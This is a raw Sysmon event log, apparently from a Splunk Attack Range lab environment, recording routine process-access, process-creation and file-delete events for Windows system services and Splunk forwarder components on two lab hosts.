10341000x8000000000000000291279Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.356{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291278Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.356{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291277Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.356{BEA10069-D0C1-6086-0500-00000000BB01}416952C:\Windows\system32\csrss.exe{BEA10069-0201-6088-F229-00000000BB01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291276Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.356{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-0201-6088-F229-00000000BB01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291275Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.352{BEA10069-0201-6088-F229-00000000BB01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000291274Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.019{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B61A675180DC6CE48BBDFE0E01587260,SHA256=C56D63F154EB5EB5D41BCEEB0DB37A96FD090D8CFCC6D8BF92C863D8E9E27316,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439940Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:25.094{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439939Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:25.094{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439947Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:26.865{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B148858793642BA34570C6FCB1105E3,SHA256=0FE48CC681E9CF310454A5DA52AD03A48F54472FD29D22CD8E55F46E81424E98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291316Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.692{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-0202-6088-F429-00000000BB01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291315Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.692{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291314Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.692{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291313Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.692{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291312Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.692{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291311Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.692{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291310Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.692{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291309Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.692{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291308Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.692{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291307Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.692{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291306Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.692{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-0202-6088-F429-00000000BB01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291305Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.692{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-0202-6088-F429-00000000BB01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291304Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.692{BEA10069-0202-6088-F429-00000000BB01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000291303Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.356{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE2101521EEA9A8B9B12AB5029526BA3,SHA256=1B13A16E6238992C94D7AFD1B0DAAC817725CEE21CAE57E633E265B6030161C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291302Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.021{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-0202-6088-F329-00000000BB01}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291301Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.021{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291300Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.021{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291299Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.021{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291298Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.021{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291297Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 